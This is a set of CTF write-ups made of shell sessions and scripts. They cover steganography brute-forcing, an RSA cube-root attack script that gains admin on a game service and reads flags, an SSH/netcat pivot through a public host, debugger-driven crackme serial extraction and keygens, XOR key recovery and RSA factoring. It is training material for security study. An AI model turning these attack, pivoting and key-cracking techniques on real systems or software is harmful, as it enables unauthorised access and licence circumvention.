# CSCamp CTF Quals 2k13: Steganography - stega4.wav


# ./keygen 4 "{a..z}" | xargs -I {} steghide extract -sf stega4.wav -p {}
wrote extracted data to "flag.zip".
# fcrackzip -u -c aA1! -p aaaaa flag.zip
PASSWORD FOUND!!!!: pw == 3L33t
# unzip -P 3L33t flag.zip && cat flag.txt
Archive:  flag.zip
  inflating: flag.txt
The Flag is {a57085396f9200c6d38ff66ffa1d3c71}

# rwthCTF 2k13 - smartgrid


# cat grid.pub
-----BEGIN PUBLIC KEY-----
...
-----END PUBLIC KEY-----
# openssl rsa -pubin -inform PEM -text -noout < grid.pub | grep '('
Public-Key: (4096 bit)
Exponent: 3 (0x3)
# ipython
: import gmpy
: message = 2**1024
: modulus = gmpy.mpz(2**4096)
: cube_root = modulus.root(3)[0]
: if message < cube_root:
    print "Go!"
Go!
# cat netlib.py
import socket
import time

# Socket Client
class sc:
        def __init__(self, host, port, layer4):
                self.host = host
                self.port = int(port)
                self.layer4 = layer4

        def connect(self, max_retries, pause):
                if self.layer4 == "tcp":
                        socket_type = socket.SOCK_STREAM
                elif self.layer4 == "udp":
                        socket_type = socket.SOCK_DGRAM
                self.socket = socket.socket(socket.AF_INET, socket_type)
                retries = 0
                while True:
                        try:
                                self.socket.connect((self.host, self.port))
                                return True
                        except:
                                retries += 1
                                if retries == max_retries:
                                        print "Unable to connect."
                                        return False
                                time.sleep(pause)

        def send(self, data):
                try:
                        count = self.socket.send(data)
                except:
                        print "Unable to send data."
                        return False

                if count == len(data):
                        return True
                else:
                        print "Unable to send all data."
                        return False

        def recv(self, buffsize, timeout):
                data = None
                self.socket.settimeout(timeout)
                try:
                        data = self.socket.recv(buffsize)
                except socket.timeout:
                        print "Receive timeout"
                except:
                        print "Unexpected exception while receiving"
                self.socket.settimeout(None)
                return data

        def close(self):
                self.socket.close()
# cat smartgrid.py
#!/usr/bin/python

import gmpy
import hashlib
import netlib
import sys
import time

buffsize = 4096
max_retries = 2
pause = 0.5
timeout = 2

ip = sys.argv[1]
port = sys.argv[2]
proto = sys.argv[3]

def cube_root_attack(message):
        # With e = 3 and m < n**(1/3), c = m**3 mod n never wraps around, so
        # c == m**3 over the integers and m is the exact integer cube root of c.
        m = gmpy.mpz(message)
        cube_root = m.root(3)[0]
        # The service expects the SHA-256 of the decimal root as the answer.
        sha = hashlib.sha256()
        sha.update(str(cube_root))
        return sha.hexdigest()

sc = netlib.sc(ip, port, proto)
if sc.connect(max_retries, pause):
        while True:
                data = sc.recv(buffsize, timeout)
                if data.endswith(">"):
                        break

        if sc.send("help\r\n") == False:
                sys.exit()
        help = ""
        while True:
                data = sc.recv(buffsize, timeout)
                if data.endswith(">"):
                        help += data[:-1]
                        break
                else:
                        help += data

        if help.find("readstatus") == -1: # Is admin mode active?
                if sc.send("admin\r\n") == False:
                        sys.exit()
                data = sc.recv(buffsize, timeout)
                if data == None:
                        sys.exit()
                challenge = data.split('=')[1]
                solution = cube_root_attack(int(challenge))
                if sc.send("answer=" + solution + "\r\n") == False:
                        sys.exit()
                while True:
                        data = sc.recv(buffsize, timeout)
                        if data.endswith(">"):
                                break

        if sc.send("listconsumers" + "\r\n") == False:
                sys.exit()
        listconsumers = ""
        while True:
                data = sc.recv(buffsize, timeout)
                if data.endswith(">"):
                        listconsumers += data[:-2]
                        break
                else:
                        listconsumers += data
        listconsumers = listconsumers[15:-2]
        listconsumers = listconsumers.replace("'","")
        uuids = listconsumers.split(", ")
        uuids.reverse()

        for i in range(30):
                if sc.send("readstatus " + uuids[i] + "\r\n") == False:
                        sys.exit()
                result = ""
                while True:
                        data = sc.recv(buffsize, timeout)
                        if data.endswith(">"):
                                result += data[:-2]
                                break
                        else:
                                result += data
                pos = result.find("status=")
                status = result[pos+7:pos+23]
                pos = result.find("tstamp=")
                tstamp = result[pos+7:pos+17]
                if int(time.time()) - int(tstamp) < 15 * 60: # Last 15 minutes
                        print status # Flag
        sc.close()
# ./smartgrid.py 10.22.x.1 21721 tcp
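An added example (not part of the write-up or its scripts) of the cube-root attack the admin challenge falls to: with e = 3 and a message below the cube root of the modulus, c = m**3 is never reduced, so the plaintext is an exact integer root. It uses a pure-Python integer root instead of gmpy; the 2**4096 stand-in modulus and the sample message are constructed here.

```python
import hashlib


def integer_nth_root(x, n):
    """Return (r, exact): r = floor(x ** (1/n)) for x >= 0, exact = (r**n == x)."""
    if x < 0 or n < 1:
        raise ValueError("x must be non-negative and n >= 1")
    if x < 2:
        return x, True
    # Newton iteration r -> ((n-1)*r + x // r**(n-1)) // n, started above the
    # root so the sequence decreases monotonically to floor(x ** (1/n)).
    r = 1 << ((x.bit_length() + n - 1) // n)
    while True:
        nxt = ((n - 1) * r + x // pow(r, n - 1)) // n
        if nxt >= r:
            break
        r = nxt
    return r, pow(r, n) == x


def vulnerable_modulus_check(n, e, message_bits):
    """The check the write-up does in ipython: does every message of
    message_bits bits stay below the e-th root of n, so that m**e < n?"""
    root, _ = integer_nth_root(n, e)
    return (1 << message_bits) <= root


def recover_from_unpadded_cube(c):
    """Recover m from c = m**3 when m**3 did not exceed the modulus.
    If the cube did wrap around n, c is not a perfect cube and we say so."""
    m, exact = integer_nth_root(c, 3)
    if not exact:
        raise ValueError("c is not a perfect cube: m**3 wrapped around n")
    return m


def challenge_answer(c):
    """Same answer format as the write-up's cube_root_attack():
    SHA-256 hex digest of the decimal root."""
    m = recover_from_unpadded_cube(c)
    return hashlib.sha256(str(m).encode()).hexdigest()


if __name__ == "__main__":
    # Constructed demo values (not the CTF's): a 504-bit message under a
    # 4096-bit modulus with e = 3, the situation the write-up checks for.
    n = 1 << 4096
    print(vulnerable_modulus_check(n, 3, 1024))  # True: 2**1024 < n**(1/3)
    m = int.from_bytes(b"constructed challenge" * 3, "big")
    c = pow(m, 3, n)  # equals m**3, no reduction happens
    print(recover_from_unpadded_cube(c) == m)
    print(challenge_answer(c))
```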
References

http://h4des.org/blog/index.php?/archives/339-rwthCTF-2013-smartgrid-write-up.html

# Connecting two private hosts through a public pivot


A reverse ssh tunnel from host1 to pivot (connections to pivot:1337 are forwarded back to host1:1234)

host1# ssh -R localhost:1337:localhost:1234 -f -N root@pivot
host1# nc -l localhost 1234

A local (forward) ssh tunnel from host2 to pivot (connections to host2:1234 are forwarded to pivot:1337)

host2# ssh -L localhost:1234:localhost:1337 -f -N root@pivot
host2# nc localhost 1234

Port forwarding and tunneling

[host2:r---host2:1234] => host2:x---pivot:22 => [pivot:s---pivot:1337]*
[pivot:s---pivot:1337]*=> pivot:22--host1:y  => [host1:t---host1:1234]

# CSCamp CTF Quals 2k13: Reversing - Challenge (dotnet)


# file challenge.exe
challenge.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Run challenge.exe:
. Username = Cookie
. Serial Number = Monsters
. Check
> Authentication failed!

Attach to the process using windbg:
> * Load SOS and symbols
> .loadby sos mscorwks; .symfix; .reload
> * Show all threads
> ~
   0  Id: 3180.39b0 Suspend: 1 Teb: 7ffdf000 Unfrozen
   1  Id: 3180.30a8 Suspend: 1 Teb: 7ffde000 Unfrozen
   2  Id: 3180.3ad8 Suspend: 1 Teb: 7ffdd000 Unfrozen
   3  Id: 3180.3a6c Suspend: 1 Teb: 7ffdc000 Unfrozen
.  4  Id: 3180.38e0 Suspend: 1 Teb: 7ffdb000 Unfrozen
> * Show all managed threads
> !threads
ThreadCount: 2
UnstartedThread: 0
BackgroundThread: 1
PendingThread: 0
DeadThread: 0
Hosted Runtime: no
                                      PreEmptive   GC Alloc           Lock
       ID OSID ThreadOBJ    State     GC       Context       Domain   Count APT Exception
   0    1 39b0 0015b1b8      6020 Enabled  00000000:00000000 001653f8     0 STA
   2    2 3ad8 0015ec68      b220 Enabled  00000000:00000000 001653f8     0 MTA (Finalizer)
> * Switch to thread 0 (new current thread)
> ~0s
eax=03370088 ebx=013d8740 ecx=00001f40 edx=001a2c58 esi=01400ed0 edi=014322f4
eip=7c91e514 esp=0012ed8c ebp=0012ee20 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
7c91e514 c3              ret
> * View the stack
> !clrstack
OS Thread Id: 0x39b0 (0)
ESP       EIP
0012ed98 7c91e514 [InlinedCallFrame: 0012ed98] System.Windows.Forms.UnsafeNativeMethods.WaitMessage()
0012ed94 7b1d8e78 System.Windows.Forms.Application+ComponentManager.System.Windows.Forms.UnsafeNativeMethods.IMsoComponentManager.FPushMessageLoop(Int32, Int32, Int32)
0012ee30 7b1d8967 System.Windows.Forms.Application+ThreadContext.RunMessageLoopInner(Int32, System.Windows.Forms.ApplicationContext)
0012ee84 7b1d87b1 System.Windows.Forms.Application+ThreadContext.RunMessageLoop(Int32, System.Windows.Forms.ApplicationContext)
0012eeb4 7b195921 System.Windows.Forms.Application.Run(System.Windows.Forms.Form)
0012eec8 00de5498 (System.Windows.Forms.Form)
0012eecc 00de1eee StarwareCTF_DotNetChall.Program.Main()
0012f148 79e71b4c [CustomGCFrame: 0012f148]
0012f110 79e71b4c [GCFrame: 0012f110]
0012f12c 79e71b4c [GCFrame: 0012f12c]
0012f310 79e71b4c [HelperMethodFrame_1OBJ: 0012f310] System.RuntimeMethodHandle._InvokeMethodFast(System.Object, System.Object[], System.SignatureStruct ByRef, System.Reflection.MethodAttributes, System.RuntimeTypeHandle)
0012f380 792d5608 System.RuntimeMethodHandle.InvokeMethodFast(System.Object, System.Object[], System.Signature, System.Reflection.MethodAttributes, System.RuntimeTypeHandle)
0012f3d0 792d540f System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo, Boolean)
0012f40c 792d529e System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo)
0012f42c 00de0294 CompressShell.Main(System.String[])
> * Show objects on the heap (MT = MethodTable)
> !dumpheap -type StarwareCTF_DotNetChall
 Address       MT     Size
013d7cf4 00a0732c      348
total 1 objects
Statistics:
      MT    Count    TotalSize Class Name
00a0732c        1          348 StarwareCTF_DotNetChall.MainForm
Total 1 objects
0012f688 79e71b4c [GCFrame: 0012f688]
> * Show what methods the object exposes
> !dumpmt -md 00a0732c
EEClass: 00df38d8
Module: 00a03d94
Name: StarwareCTF_DotNetChall.MainForm
mdToken: 02000009  (StarwareCTF_DotNetChall, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null)
BaseSize: 0x15c
ComponentSize: 0x0
Number of IFaces in IFaceMap: 15
Slots in VTable: 379
--------------------------------------
MethodDesc Table
   Entry MethodDesc      JIT Name
7b176338   7afe8338   PreJIT System.Windows.Forms.Form.ToString()
79286ac0   79104968   PreJIT System.Object.Equals(System.Object)
79286b30   79104998   PreJIT System.Object.GetHashCode()
7a575e40   7a460c00   PreJIT System.ComponentModel.Component.Finalize()
...
7b7220b0   7afe83e0   PreJIT System.Windows.Forms.Form.OnResizeEnd(System.EventArgs)
00a0c320   00a072a0      JIT StarwareCTF_DotNetChall.MainForm..ctor()
00a0c744   00a072ac      JIT StarwareCTF_DotNetChall.MainForm.checkButton_Click(System.Object, System.EventArgs)
00a0cc58   00a072b8      JIT StarwareCTF_DotNetChall.MainForm.ChangeAuthenticationMessage(System.String)
00a0d018   00a072c4      JIT StarwareCTF_DotNetChall.MainForm.ChangeAuthenticationMessageCallback(System.String)
00a0cc00   00a072d0     NONE StarwareCTF_DotNetChall.MainForm.OnAuthentication(StarwareCTF_DotNetChall.AuthenticationResult)
00a0c330   00a072e4      JIT StarwareCTF_DotNetChall.MainForm.InitializeComponent()
> * Disassemble the method
> !U 00a072ac
Normal JIT generated code
StarwareCTF_DotNetChall.MainForm.checkButton_Click(System.Object, System.EventArgs)
Begin 00de54b0, size 12a
00de54b0 55              push    ebp
00de54b1 8bec            mov     ebp,esp
00de54b3 57              push    edi
00de54b4 56              push    esi
00de54b5 53              push    ebx
00de54b6 50              push    eax
00de54b7 8bf9            mov     edi,ecx
00de54b9 b98814bf00      mov     ecx,0BF1488h (MT: StarwareCTF_DotNetChall.KeyVerification)
00de54be e859cbc0ff      call    009f201c (JitHelp: CORINFO_HELP_NEWSFAST)
00de54c3 8bf0            mov     esi,eax
00de54c5 8bce            mov     ecx,esi
00de54c7 ff15c014bf00    call    dword ptr ds:[0BF14C0h] (StarwareCTF_DotNetChall.KeyVerification..ctor(), mdToken: 0600002b)
00de54cd 8b8f44010000    mov     ecx,dword ptr [edi+144h]
00de54d3 ff151815bf00    call    dword ptr ds:[0BF1518h] ((System.Object), mdToken: 060000e8)
00de54d9 8bd8            mov     ebx,eax
00de54db 8b8f48010000    mov     ecx,dword ptr [edi+148h]
00de54e1 ff151815bf00    call    dword ptr ds:[0BF1518h] ((System.Object), mdToken: 060000e8)
00de54e7 50              push    eax
00de54e8 8bd3            mov     edx,ebx
00de54ea 8bce            mov     ecx,esi
00de54ec ff156414bf00    call    dword ptr ds:[0BF1464h] (StarwareCTF_DotNetChall.KeyVerification.CheckKey(System.String, System.String), mdToken: 06000029)
...
> * Display one dword (4 bytes)
> dd 0BF1464h L1
00bf1464  00de5960
> * Disassemble the method
> !U 00de5960
Normal JIT generated code
StarwareCTF_DotNetChall.KeyVerification.CheckKey(System.String, System.String)
Begin 00de5960, size 39
>>> 00de5960 55              push    ebp
00de5961 8bec            mov     ebp,esp
00de5963 57              push    edi
00de5964 56              push    esi
00de5965 50              push    eax
00de5966 33c0            xor     eax,eax
00de5968 8945f4          mov     dword ptr [ebp-0Ch],eax
00de596b 8bf1            mov     esi,ecx
00de596d 8bfa            mov     edi,edx
00de596f 8b4d08          mov     ecx,dword ptr [ebp+8]
00de5972 ff15242bbf00    call    dword ptr ds:[0BF2B24h] ((System.Object), mdToken: 060000d8)
00de5978 8bc8            mov     ecx,eax
00de597a 8bd7            mov     edx,edi
00de597c 894df4          mov     dword ptr [ebp-0Ch],ecx
00de597f 8bce            mov     ecx,esi
00de5981 ff157014bf00    call    dword ptr ds:[0BF1470h] (StarwareCTF_DotNetChall.KeyVerification.GenerateKeyFromUsername(System.String), mdToken: 0600002a)
00de5987 8bd0            mov     edx,eax
00de5989 8b4df4          mov     ecx,dword ptr [ebp-0Ch]
00de598c ff15042cbf00    call    dword ptr ds:[0BF2C04h] ((System.String, System.String), mdToken: 060000dc)
00de5992 59              pop     ecx
00de5993 5e              pop     esi
00de5994 5f              pop     edi
00de5995 5d              pop     ebp
00de5996 c20400          ret     4
> * Set breakpoint at address
> bp 00de5987
> * Go
> g
. Username = Cookie
. Serial Number = Monsters
. Check

> * Display Unicode chars
> du eax+c
014d1b00  "0C81B9E71D6397203F2B7C73233FC5A4"
014d1b40  "D9C6450D8037BB12BE9415B950AC3E52"
014d1b80  "1EA1B1C42B4ACD482C83FFBBA8212BE2"
014d1bc0  "28A71FE544E463B59C344F1A41A55262"
> * Clear all breakpoints
> bc *
> * Go
> g
> Authentication failed!
. Username = Cookie
. Serial Number = 0C81B9E71D6397203F2B7C73233FC5A4D9C6450D8037BB12BE9415B950AC3E521EA1B1C42B4ACD482C83FFBBA8212BE228A71FE544E463B59C344F1A41A55262
. Check
> Authentication successful. Waiting for flag

Reference

http://blog.botbie.com/2013/11/21/cscamp-ctf-quals-2013-reversing-150-write-up/

# NcN CTF 2k13: Canada (Base - 1200 pts)


# gunzip howtobasic.gz
# file howtobasic
howtobasic: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=0x1a8f284f3d67ad66c7510bc5353556e8a01db18b, stripped
# chmod +x howtobasic
# gdb --quiet ./howtobasic
(gdb) set disassembly-flavor intel
(gdb) info file
        Entry point: 0x80481c0
(gdb) run
Starting program: /root/ctf/howtobasic
Facebook CTF
Enter flag: ^C
Program received signal SIGINT, Interrupt.
0xf7ffd430 in __kernel_vsyscall ()
(gdb) finish
1234567890
0x080577a2 in ?? ()
(gdb) finish
0x0806d9a6 in ?? ()
(gdb) finish
0x08049b26 in ?? ()
(gdb) finish
0x0804932d in ?? ()
(gdb) finish
0x08049435 in ?? ()
(gdb) finish
0x0804906b in ?? ()
(gdb) finish
0x080483b6 in ?? ()
(gdb) finish
Sorry, that is not correct.
(gdb) b *0x080483b6
(gdb) run
Starting program: /root/ctf/howtobasic
Facebook CTF
Enter flag: 1234567890

(gdb) x/2i 0x080483b6
=> 0x80483b6:   test   eax,eax
   0x80483b8:   jne    0x80483f5
(gdb) x/s $eax
0x80d5298:      "1234567890\n"
(gdb) b *0x80483f5
(gdb) continue
(gdb) x/3i 0x080483f5
=> 0x80483f5:   push   eax
   0x80483f6:   xor    eax,eax
   0x80483f8:   je     0x80483fd
(gdb) b *0x80483fd
(gdb) continue
(gdb) x/2i 0x080483fd
=> 0x80483fd:   pop    eax
   0x80483fe:   jmp    0x8048486
(gdb) b *0x8048486
(gdb) continue
(gdb) x/4i 0x08048486
=> 0x8048486:   mov    eax,DWORD PTR [esp+0x14]
   0x804848a:   sub    eax,0x2
   0x804848d:   cmp    eax,DWORD PTR [esp+0x1c]
   0x8048491:   ja     0x8048403
(gdb) x/xw $esp+0x14
0xffffd604:     0x00000042
(gdb) x/xw $esp+0x1c
0xffffd60c:     0x00000000
(gdb) b *0x8048403
(gdb) continue
(gdb) x/20i 0x08048403
=> 0x8048403:   mov    eax,DWORD PTR [esp+0x1c] // eax = 0x0
   0x8048407:   and    eax,0x7   // eax = 0x0 
   0x804840a:   movzx  eax,BYTE PTR [eax+0x80d108c] // eax = 0x4d [0x80d108c] = "MOVEFAST"
   0x8048411:   not    eax    // eax = 0xffffffb2
   0x8048413:   mov    BYTE PTR [esp+0x1b],al  // [esp+0x1b] = 0x000000b2
   0x8048417:   mov    eax,DWORD PTR [esp+0x1c] // eax = 0x0 
   0x804841b:   mov    edx,DWORD PTR [esp+0x10] // edx = 0x080d5298 [0x080d5298] = "1234567890\n"
   0x804841f:   add    eax,edx   // eax = 0x080d5298
   0x8048421:   movzx  eax,BYTE PTR [eax]  // eax = 0x31
   0x8048424:   not    eax    // eax = 0xffffffce
   0x8048426:   mov    BYTE PTR [esp+0x1a],al  // [esp+0x1a] = 0x0000b2ce
   0x804842a:   mov    edx,DWORD PTR ds:0x80d1088 // edx = 0x80b21e8 [0x80b21e8] = "{\177gtsyjg,xorut21.zb \"t65t~0'\"#5d,-g|t$f1(.dq\177te2.}o##%`lyy`$ x2f"
   0x8048430:   mov    eax,DWORD PTR [esp+0x1c] // eax = 0x0
   0x8048434:   add    eax,edx   // eax = 0x80b21e8
   0x8048436:   movzx  edx,BYTE PTR [eax]  // edx = 0x7b
   0x8048439:   movzx  eax,BYTE PTR [esp+0x1a] // eax = 0xce
   0x804843e:   movzx  ecx,BYTE PTR [esp+0x1b] // ecx = 0xb2
   0x8048443:   xor    eax,ecx   // eax = 0x7c
   0x8048445:   cmp    dl,al   // dl != al
   0x8048447:   je     0x8048481
(gdb) x/5i 0x8048481
   0x8048481:   add    DWORD PTR [esp+0x1c],0x1
   0x8048486:   mov    eax,DWORD PTR [esp+0x14]
   0x804848a:   sub    eax,0x2
   0x804848d:   cmp    eax,DWORD PTR [esp+0x1c]
   0x8048491:   ja     0x8048403
(gdb) quit
# cat canada.py
#!/usr/bin/python

constraint = "{\177gtsyjg,xorut21.zb \"t65t~0'\"#5d,-g|t$f1(.dq\177te2.}o##%`lyy`$ x2f"
xorkey = "MOVEFAST"
key = ""

for i in range(len(constraint)):
        c = ord(constraint[i])
        x = ord(xorkey[i%8])
        # The binary checks ~k ^ ~x == c; since ~k ^ ~x == k ^ x, k = c ^ x.
        k = c ^ x
        key += chr(k)
print key
# ./canada.py
60115893a79735aec54ed5ea91fbdbf0ab192e5eea24956fc29fed38466af9a2
# ./howtobasic
Facebook CTF
Enter flag: 60115893a79735aec54ed5ea91fbdbf0ab192e5eea24956fc29fed38466af9a2
Winner! Post your flag.

# NcN CTF 2k13: Algeria (Base - 900 pts)


# echo -n '425a6839314159265359d77d47c600ca357b84e810004070edfd1a082a7fffff2b0000800860083deaf9428555294ad51a5512b4c5365ef11200000000000003410a8cca604668004600000261800068000c9a00000d008554432680d00680034000009a95289ea651a6046d09b4098200c4c01494a6a6940007a806806400007b7b65fec32018b455437f94574ce0c6e89aa40860733f66a6430f6393e3b9dd7cfcbb7d5d7d1cba38eae3a82257a278eb6d36b6b28894a68696858a96a82a95b028c2e26db6844d60d3359ab6b69ad8d95c5ca5aa71a6138a63566da9031018a2d34d929b52b6663260db6aada6cb30cd0438b1049b5559f0299840c94ca9b2ca6ad121a2c26aacd0acc451b4954d343480cb6a9acc622b8ec413d4efdfbff7bbc52354d0a17286a4abf2db616465828b89b10187a3f6f2a9d9bd3a191caa1e2ef2e101cc8b534a8e25354754d491e1f8fa3b97878d4e5324e34bfcf36e240bb2ad09d66db136ccad904b652862d0952ccae96e1616b0b8a5ac8d36d444d81b3656c0352b232b22cd2ad5b6b012b2b22b6d4a62336ab29b0d52c62cc593068b65616b48b26db6d56a9b66d59b5b034b2526616c555caab394495db006d990aeccb0b4a25c615c7358e01cd85b2d956d4660a198a16c50da27246900e2ca90b8c9473556d0a2ada2bb95288c24985cf60d6b32d6a9a594dac406436b6ac11954a30b4c834cab699298db4a564c4dad6b588da9b26a018a6aa985b199a992d531294932d44910814b304c80d02936564866881acda0c6698a81294a02cc44030af363c9b3eb97ab8f8c1cfb83aeb75e7ebae9e7faf77ebeade3ce77edbc7cdeef967acf65d787c20f0536454b36c0d998ab35503686ccd84795550e50f22034b0b5511cd49aa33446c09a8d66a24ca321598596cb535880d890d95b4226cdac8a971252c9153c38054b06a6aab416b22a58a29ad121d2a34924728aae0918ba701570495855cd785550e2205c06a5266ab9491ca1c35550d5017800ec6da6c98aa5649a24334a3166a84b96d8a970256d22534c852cdadac284b5052b56a922d0c4a596a36998c46a98ad98d532d25acb2ad1416916a98165491a14856aa942205002a61668566162d69534ad0c2d16295aca455b0616126c36141929ab5325986832159223101859252c2329b42c9332a8d0834daab4b02c84ad858b16d3584ac8d6b55a180655a86d5546b150655894d2d06d294c90306696ca505050c2b2a349144a4c440aa56ac064d16cb62b2daa1a2d628c5915ad5604cacc952d9828955408519500071631e1f7c1f867f11d2f076331f1821e0db0604cc0a51e54cd10fe906c2531dc02045520201c25547cd09fa1369c5c29564c3d13b3241deef406acc8c
633fe8d450b21c001007e2ee48a70a121aefa8f8c' | xxd -p -r | tar xvjf -
main.js
# grep 'var loginScript' main.js | sed 's/var /exports./' > variable.js
# nodejs
> ls = require('./variable.js');
> eval(ls.loginScript.slice(2,-2));
[ 'if (document.getElementById(\'user_pass\').value === "0f97972a0efd34ebb3111ac8ec6976740529df531e94df14d0ee8614a07d153b") { alert(\'win\'); } else { alert(\'try again\'); }' ]

# SecurityArtWork: Reversing challenge


# wget --quiet http://www.securityartwork.es/wp-content/uploads/2013/11/serial.exe
# file serial.exe
serial.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
- Breakpoints
004019B5  |. E8 F6FCFFFF               CALL serial.004016B0
00401776   . 83E8 0F                   SUB EAX,0F
004018FA   . 39C2                      CMP EDX,EAX
- Key function
004018D2   . 8B45 F8                   MOV EAX,DWORD PTR SS:[EBP-8]
004018D5   . 83C0 01                   ADD EAX,1
004018D8   . 8B0485 00404000           MOV EAX,DWORD PTR DS:[EAX*4+404000]
004018DF   . 8B1485 40704000           MOV EDX,DWORD PTR DS:[EAX*4+407040]
004018E6   . 8B45 F8                   MOV EAX,DWORD PTR SS:[EBP-8]
004018E9   . 83C0 02                   ADD EAX,2
004018EC   . 8B0485 00404000           MOV EAX,DWORD PTR DS:[EAX*4+404000]
004018F3   . 8B0485 40704000           MOV EAX,DWORD PTR DS:[EAX*4+407040]
004018FA   . 39C2                      CMP EDX,EAX
004018FC   . 75 0C                     JNZ SHORT serial.0040190A

# cat serial.py
#!/usr/bin/python

check = [0,4,6,0,6,0,0,5,6,3,0,5,6,9,2,5]
key = ""

for i in range(16):
        for j in range(10):
                if i*j % 10 == check[i]:
                        key += str(j)
                        break
print key
# ./serial.py
0430400527053331
# cat serials.py
#!/usr/bin/python

check = [0,4,6,0,6,0,0,5,6,3,0,5,6,9,2,5]
key = ""

def serial(key,p):
        for n in range(10):
                if p*n % 10 == check[p]:
                        if p < 15:
                                serial(key + str(n),p+1)
                        else:
                                print key + str(n)
serial("",0)

C:\> serial.exe 0430400527053331
Valid serial number :-)

# CSCamp CTF Quals 2k13: Steganography - PNG


# file enc.png
enc.png: data
# cat png.py 
#!/usr/bin/python

png = 0x89504e470d0a  # first 6 bytes of the PNG signature (known plaintext)
enc = 0xf1601c2c3e73  # first 6 bytes of enc.png

key = str(hex(png^enc))[2:].decode("hex")  # repeating 6-byte XOR key
print key

encfd = open("enc.png","rb")
data = encfd.read()
encfd.close()
size = len(data)

decfd=open("dec.png","wb")
j = 0

for i in data:
    decfd.write(chr(ord(i)^ord(key[j%6])))
    j+=1

decfd.close()
# ./png.py
x0Rk3y
# file dec.png
dec.png: PNG image data, 640 x 400, 8-bit/color RGBA, non-interlaced
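Both the NcN "Canada" flag and the CSCamp PNG key above come down to a repeating-key XOR, in opposite directions: in Canada the key ("MOVEFAST") and the stored constraint are known and the flag is unknown; for the PNG the plaintext header (the PNG signature) is known and the 6-byte key is unknown. As an added example (not either write-up's script), one helper covers both, emulates the check loop seen in gdb, and validates the recovered PNG key against the part of the signature that lies beyond the key length. The constraint, key and header bytes are the ones shown on this page.

```python
from itertools import cycle

PNG_SIGNATURE = bytes.fromhex("89504e470d0a1a0a")


def xor_cycle(data, key):
    """XOR data against key repeated as often as needed."""
    if not key:
        raise ValueError("empty key")
    return bytes(a ^ b for a, b in zip(data, cycle(key)))


# --- NcN "Canada": invert the check loop seen in gdb ---------------------
CANADA_CONSTRAINT = b"{\177gtsyjg,xorut21.zb \"t65t~0'\"#5d,-g|t$f1(.dq\177te2.}o##%`lyy`$ x2f"
CANADA_KEY = b"MOVEFAST"


def canada_check(flag):
    """Emulate the binary: for each i, (~flag[i]) ^ (~key[i % 8]) == constraint[i],
    with 8-bit NOT (the `not eax` / `mov BYTE PTR ..., al` sequence)."""
    if len(flag) != len(CANADA_CONSTRAINT):
        return False
    return all(((~f & 0xff) ^ (~k & 0xff)) == c
               for f, k, c in zip(flag, cycle(CANADA_KEY), CANADA_CONSTRAINT))


def canada_flag():
    """Since ~a ^ ~b == a ^ b, the flag is simply constraint XOR key."""
    return xor_cycle(CANADA_CONSTRAINT, CANADA_KEY)


# --- CSCamp "PNG": recover the key from the known file signature ----------
def recover_xor_key(ciphertext, known_plaintext, key_len):
    """Known-plaintext recovery of a repeating key of key_len bytes; needs at
    least key_len bytes of known plaintext at offset 0."""
    if len(known_plaintext) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return xor_cycle(ciphertext[:key_len], known_plaintext[:key_len])


def decrypt_png(ciphertext, key_len=6):
    """Recover the key from the first key_len bytes, decrypt, and check that
    the full 8-byte signature comes out (bytes 6 and 7 were not used for the
    key, so a wrong key_len fails here instead of producing garbage)."""
    key = recover_xor_key(ciphertext, PNG_SIGNATURE, key_len)
    plain = xor_cycle(ciphertext, key)
    if not plain.startswith(PNG_SIGNATURE):
        raise ValueError("decrypted data is not a PNG: wrong key length?")
    return key, plain


if __name__ == "__main__":
    print(canada_flag().decode(), canada_check(canada_flag()))
    # Constructed enc.png stand-in: a PNG header encrypted with the page's key.
    sample = xor_cycle(PNG_SIGNATURE + b"\x00\x00\x00\rIHDR", b"x0Rk3y")
    key, plain = decrypt_png(sample)
    print(key.decode(), plain[:8].hex())
```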

# CSCamp CTF Quals 2k13: Crypto - public is enough! (400 points)


# grep -v - public.pem | tr -d '\n' | base64 -d | openssl asn1parse -inform DER -i
    0:d=0  hl=2 l= 124 cons: SEQUENCE
    2:d=1  hl=2 l=  13 cons:  SEQUENCE
    4:d=2  hl=2 l=   9 prim:   OBJECT            :rsaEncryption
   15:d=2  hl=2 l=   0 prim:   NULL
   17:d=1  hl=2 l= 107 prim:  BIT STRING
# grep -v - public.pem | tr -d '\n' | base64 -d | openssl asn1parse -inform DER -i -strparse 17
    0:d=0  hl=2 l= 104 cons: SEQUENCE
    2:d=1  hl=2 l=  97 prim:  INTEGER           :CAD984557C97E039431A226AD727F0C6D43EF3D418469F1B375049B229843EE9F83B1F97738AC274F5F61F401F21F1913E4B64BB31B55A38D398C0DFED00B1392F0889711C44B359E7976C617FCC734F06E3E95C26476091B52F462E79413DB5
  101:d=1  hl=2 l=   3 prim:  INTEGER           :010001
# openssl rsa -pubin -inform PEM -text -noout < public.pem
Public-Key: (768 bit)
Modulus:
    00:ca:d9:84:55:7c:97:e0:39:43:1a:22:6a:d7:27:
    f0:c6:d4:3e:f3:d4:18:46:9f:1b:37:50:49:b2:29:
    84:3e:e9:f8:3b:1f:97:73:8a:c2:74:f5:f6:1f:40:
    1f:21:f1:91:3e:4b:64:bb:31:b5:5a:38:d3:98:c0:
    df:ed:00:b1:39:2f:08:89:71:1c:44:b3:59:e7:97:
    6c:61:7f:cc:73:4f:06:e3:e9:5c:26:47:60:91:b5:
    2f:46:2e:79:41:3d:b5
Exponent: 65537 (0x10001)
# # Find p and q using this URL http://www.factordb.com/index.php
n = 1230186684530117755130494958384962720772853569595334792197322452151726400507263657518745202199786469389956474942774063845925192557326303453731548268507917026122142913461670429214311602221240479274737794080665351419597459856902143413
p = 33478071698956898786044169848212690817704794983713768568912431388982883793878002287614711652531743087737814467999489
q = 36746043666799590428244633799627952632279158164343087642676032283815739666511279233373417143396810270092798736308917

# ipython
: import gmpy
